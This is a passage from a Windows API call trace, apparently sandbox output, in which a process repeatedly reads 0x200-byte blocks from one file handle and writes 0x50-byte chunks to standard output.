returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.321] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.321] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.322] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.322] ReadFile 
(in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.323] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.323] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 
lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, 
lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.324] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.324] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.325] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.325] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0096.325] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.325] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] 
GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.326] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.326] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.326] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.326] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | 
out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, 
lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.327] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.327] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.327] GetFileType (hFile=0x4c) returned 0x1 [0096.327] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c 
